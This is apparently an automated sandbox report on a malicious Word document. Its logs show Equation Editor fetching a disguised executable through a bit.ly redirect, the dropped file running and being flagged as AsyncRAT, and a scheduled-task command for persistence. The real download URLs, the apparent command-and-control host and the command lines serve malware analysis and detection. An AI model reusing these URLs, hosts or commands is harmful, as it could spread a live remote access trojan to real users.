                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 22, 2021 19:52:33.966006994 CET5219753192.168.2.228.8.8.8
                                                  Feb 22, 2021 19:52:34.014686108 CET53521978.8.8.8192.168.2.22
                                                  Feb 22, 2021 19:52:34.251554966 CET5309953192.168.2.228.8.8.8
                                                  Feb 22, 2021 19:52:34.357984066 CET53530998.8.8.8192.168.2.22
                                                  Feb 22, 2021 19:52:53.760273933 CET5283853192.168.2.228.8.8.8
                                                  Feb 22, 2021 19:52:53.819189072 CET53528388.8.8.8192.168.2.22
                                                  Feb 22, 2021 19:52:55.110183954 CET6120053192.168.2.228.8.8.8
                                                  Feb 22, 2021 19:52:55.161643982 CET53612008.8.8.8192.168.2.22
                                                  Feb 22, 2021 19:52:55.171720028 CET4954853192.168.2.228.8.8.8
                                                  Feb 22, 2021 19:52:55.224850893 CET53495488.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Feb 22, 2021 19:52:33.966006994 CET192.168.2.228.8.8.80xc52cStandard query (0)bit.lyA (IP address)IN (0x0001)
                                                  Feb 22, 2021 19:52:34.251554966 CET192.168.2.228.8.8.80x4d68Standard query (0)sgkmudder.org.trA (IP address)IN (0x0001)
                                                  Feb 22, 2021 19:52:53.760273933 CET192.168.2.228.8.8.80x5410Standard query (0)greatestyear2021.ddns.netA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Feb 22, 2021 19:52:34.014686108 CET8.8.8.8192.168.2.220xc52cNo error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                  Feb 22, 2021 19:52:34.014686108 CET8.8.8.8192.168.2.220xc52cNo error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                  Feb 22, 2021 19:52:34.357984066 CET8.8.8.8192.168.2.220x4d68No error (0)sgkmudder.org.tr93.89.224.134A (IP address)IN (0x0001)
                                                  Feb 22, 2021 19:52:53.819189072 CET8.8.8.8192.168.2.220x5410No error (0)greatestyear2021.ddns.net79.134.225.49A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • bit.ly
                                                  • sgkmudder.org.tr

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.224916767.199.248.1080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 22, 2021 19:52:34.079585075 CET0OUTGET /2Me6ei3 HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: bit.ly
                                                  Connection: Keep-Alive
                                                  Feb 22, 2021 19:52:34.227475882 CET1INHTTP/1.1 301 Moved Permanently
                                                  Server: nginx
                                                  Date: Mon, 22 Feb 2021 18:52:34 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 133
                                                  Cache-Control: private, max-age=90
                                                  Location: http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg
                                                  Set-Cookie: _bit=l1miQy-aa188e9258a87e82cc-00G; Domain=bit.ly; Expires=Sat, 21 Aug 2021 18:52:34 GMT
                                                  Via: 1.1 google
                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 67 6b 6d 75 64 64 65 72 2e 6f 72 67 2e 74 72 2f 32 64 2f 6d 67 4c 44 35 43 63 64 4a 78 39 59 56 4b 6c 2e 6a 70 67 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><title>Bitly</title></head><body><a href="http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg">moved here</a></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.224916893.89.224.13480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Feb 22, 2021 19:52:34.448152065 CET2OUTGET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Connection: Keep-Alive
                                                  Host: sgkmudder.org.tr
                                                  Feb 22, 2021 19:52:34.536528111 CET2INHTTP/1.1 200 OK
                                                  Connection: Keep-Alive
                                                  Cache-Control: public, max-age=604800
                                                  Expires: Mon, 01 Mar 2021 18:52:32 GMT
                                                  Content-Type: image/jpeg
                                                  Last-Modified: Mon, 22 Feb 2021 12:08:29 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 1143808
                                                  Date: Mon, 22 Feb 2021 18:52:32 GMT
                                                  Server: LiteSpeed


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:19:52:36
                                                  Start date:22/02/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                  Imagebase:0x13fb80000
                                                  File size:1424032 bytes
                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:19:52:37
                                                  Start date:22/02/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:19:52:42
                                                  Start date:22/02/2021
                                                  Path:C:\Users\Public\69577.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\Public\69577.exe
                                                  Imagebase:0xf60000
                                                  File size:1143808 bytes
                                                  MD5 hash:DCCD2F6A61F8D95552863B537F2B6698
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 11%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:19:52:49
                                                  Start date:22/02/2021
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
                                                  Imagebase:0xe10000
                                                  File size:179712 bytes
                                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:19:52:50
                                                  Start date:22/02/2021
                                                  Path:C:\Users\Public\69577.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\Public\69577.exe
                                                  Imagebase:0xf60000
                                                  File size:1143808 bytes
                                                  MD5 hash:DCCD2F6A61F8D95552863B537F2B6698
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >